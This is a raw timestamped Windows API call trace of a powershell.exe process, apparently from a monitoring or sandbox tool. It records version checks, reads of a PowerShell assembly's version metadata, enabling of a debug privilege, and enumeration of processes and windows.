	[0918.722] GetVersionExW (in: lpVersionInformation=0x12dc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dc80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0918.727] GetVersionExW (in: lpVersionInformation=0x12dc80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dc80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0918.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.743] GetVersionExW (in: lpVersionInformation=0x12d9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0918.745] SetErrorMode (uMode=0x1) returned 0x1
	[0918.746] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12db50 | out: lpFileInformation=0x12db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0919.554] SetErrorMode (uMode=0x1) returned 0x1
	[0919.560] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12ddc0 | out: lpdwHandle=0x12ddc0) returned 0x94c
	[0919.563] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bb72b8 | out: lpData=0x2bb72b8) returned 1
	[0919.565] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dd38, puLen=0x12dd30 | out: lplpBuffer=0x12dd38*=0x2bb7354, puLen=0x12dd30) returned 1
	[0919.571] lstrlenW (lpString="䅁") returned 1
	[0919.580] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb7430, puLen=0x12dca0) returned 1
	[0919.581] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0919.583] CoTaskMemAlloc (cb=0x2e) returned 0x342330
	[0919.583] lstrcpyW (in: lpString1=0x342330, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0919.584] CoTaskMemFree (pv=0x342330) 
	[0919.584] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb7484, puLen=0x12dca0) returned 1
	[0919.584] lstrlenW (lpString="System.Management.Automation") returned 28
	[0919.585] CoTaskMemAlloc (cb=0x3c) returned 0x2ce730
	[0919.585] lstrcpyW (in: lpString1=0x2ce730, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0919.585] CoTaskMemFree (pv=0x2ce730) 
	[0919.585] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb74e0, puLen=0x12dca0) returned 1
	[0919.585] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0919.585] CoTaskMemAlloc (cb=0x20) returned 0x3439c0
	[0919.585] lstrcpyW (in: lpString1=0x3439c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0919.585] CoTaskMemFree (pv=0x3439c0) 
	[0919.585] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb7520, puLen=0x12dca0) returned 1
	[0919.585] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0919.585] CoTaskMemAlloc (cb=0x44) returned 0x2ce730
	[0919.585] lstrcpyW (in: lpString1=0x2ce730, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0919.585] CoTaskMemFree (pv=0x2ce730) 
	[0919.585] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb7588, puLen=0x12dca0) returned 1
	[0919.585] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0919.585] CoTaskMemAlloc (cb=0x76) returned 0x2e86c0
	[0919.585] lstrcpyW (in: lpString1=0x2e86c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0919.585] CoTaskMemFree (pv=0x2e86c0) 
	[0919.586] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb7624, puLen=0x12dca0) returned 1
	[0919.586] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0919.586] CoTaskMemAlloc (cb=0x44) returned 0x2ce730
	[0919.586] lstrcpyW (in: lpString1=0x2ce730, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0919.586] CoTaskMemFree (pv=0x2ce730) 
	[0919.586] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb7688, puLen=0x12dca0) returned 1
	[0919.586] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0919.586] CoTaskMemAlloc (cb=0x58) returned 0x2962a0
	[0919.586] lstrcpyW (in: lpString1=0x2962a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0919.586] CoTaskMemFree (pv=0x2962a0) 
	[0919.586] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb7704, puLen=0x12dca0) returned 1
	[0919.586] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0919.586] CoTaskMemAlloc (cb=0x20) returned 0x3439c0
	[0919.586] lstrcpyW (in: lpString1=0x3439c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0919.586] CoTaskMemFree (pv=0x3439c0) 
	[0919.587] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x2bb73ac, puLen=0x12dca0) returned 1
	[0919.587] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0919.587] CoTaskMemAlloc (cb=0x66) returned 0x333df0
	[0919.587] lstrcpyW (in: lpString1=0x333df0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0919.587] CoTaskMemFree (pv=0x333df0) 
	[0919.587] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x0, puLen=0x12dca0) returned 0
	[0919.587] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x0, puLen=0x12dca0) returned 0
	[0919.587] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dca8, puLen=0x12dca0 | out: lplpBuffer=0x12dca8*=0x0, puLen=0x12dca0) returned 0
	[0919.587] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dc78, puLen=0x12dc70 | out: lplpBuffer=0x12dc78*=0x2bb7354, puLen=0x12dc70) returned 1
	[0919.588] CoTaskMemAlloc (cb=0x204) returned 0x2eb010
	[0919.588] VerLanguageNameW (in: wLang=0x0, szLang=0x2eb010, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0920.680] CoTaskMemFree (pv=0x2eb010) 
	[0920.680] VerQueryValueW (in: pBlock=0x2bb72b8, lpSubBlock="\\", lplpBuffer=0x12dcc8, puLen=0x12dcc0 | out: lplpBuffer=0x12dcc8*=0x2bb72e0, puLen=0x12dcc0) returned 1
	[0920.686] GetCurrentProcessId () returned 0x8ac
	[0920.702] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cbf0 | out: lpLuid=0x12cbf0*(LowPart=0x14, HighPart=0)) returned 1
	[0920.704] GetCurrentProcess () returned 0xffffffffffffffff
	[0920.705] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cc10 | out: TokenHandle=0x12cc10*=0x2e0) returned 1
	[0920.706] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2bbab30*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0920.707] CloseHandle (hObject=0x2e0) returned 1
	[0920.711] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x2e0
	[0921.616] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2bbab98, cb=0x200, lpcbNeeded=0x12dc28 | out: lphModule=0x2bbab98, lpcbNeeded=0x12dc28) returned 1
	[0921.635] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2bbae08, cb=0x18 | out: lpmodinfo=0x2bbae08*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0921.649] CoTaskMemAlloc (cb=0x804) returned 0x3444c0
	[0921.649] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x3444c0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0921.649] CoTaskMemFree (pv=0x3444c0) 
	[0921.650] CoTaskMemAlloc (cb=0x804) returned 0x3444c0
	[0921.650] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x3444c0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0921.650] CoTaskMemFree (pv=0x3444c0) 
	[0922.324] CloseHandle (hObject=0x2e0) returned 1
	[0922.332] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x8ac) returned 0x2e0
	[0922.333] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x12dd58 | out: lpExitCode=0x12dd58*=0x103) returned 1
	[0922.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bbb088, Length=0x20000, ResultLength=0x12dd20 | out: SystemInformation=0x12bbb088, ResultLength=0x12dd20*=0x4a460) returned 0xc0000004
	[0922.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bdb0b8, Length=0x4cc60, ResultLength=0x12dd20 | out: SystemInformation=0x12bdb0b8, ResultLength=0x12dd20*=0x4a460) returned 0x0
	[0923.371] EnumWindows (lpEnumFunc=0x2b366ac, lParam=0x0) returned 1
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x558
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x538
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.374] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x778
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x778
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.375] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x460
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x2440
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x24d8
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1aa4
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1ff0
	[0923.376] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1a84
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1fb0
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1e10
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x23a8
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1f24
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x21ec
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x2320
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1fd4
	[0923.377] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1880
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b18
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1d6c
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x233c
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x2368
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x2124
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x22f0
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x22ac
	[0923.378] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1cdc
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x10f0
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1f18
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x20a8
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x2004
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1f88
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1f84
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x2050
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1e04
	[0923.379] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1ecc
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1e64
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b58
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1e94
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1e28
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1df8
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1da8
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1c70
	[0923.380] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x163c
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1a10
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x186c
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1d74
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4c8
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1960
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1ce4
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b24
	[0923.381] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x14e0
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x17f0
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x854
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1268
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1624
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b9c
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x16f4
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x145c
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x17d0
	[0923.382] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1d28
	[0923.383] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xcb8
	[0923.383] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1190
	[0923.383] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x3a8
	[0923.383] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1bd0
	[0923.383] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1bfc
	[0923.801] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1a78
	[0923.801] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b90
	[0923.801] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b04
	[0923.801] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b34
	[0923.801] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1b64
	[0923.801] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1bb0
	[0923.801] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1acc
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1a2c
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x19a8
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1944
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x18c8
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x18ac
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x18ec
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1898
	[0923.802] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xc98
	[0923.803] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x153c
	[0923.803] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1808
	[0923.803] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x12a4
	[0923.803] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1740
	[0923.803] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x16c4
	[0923.803] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1820
	[0923.803] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x16ac
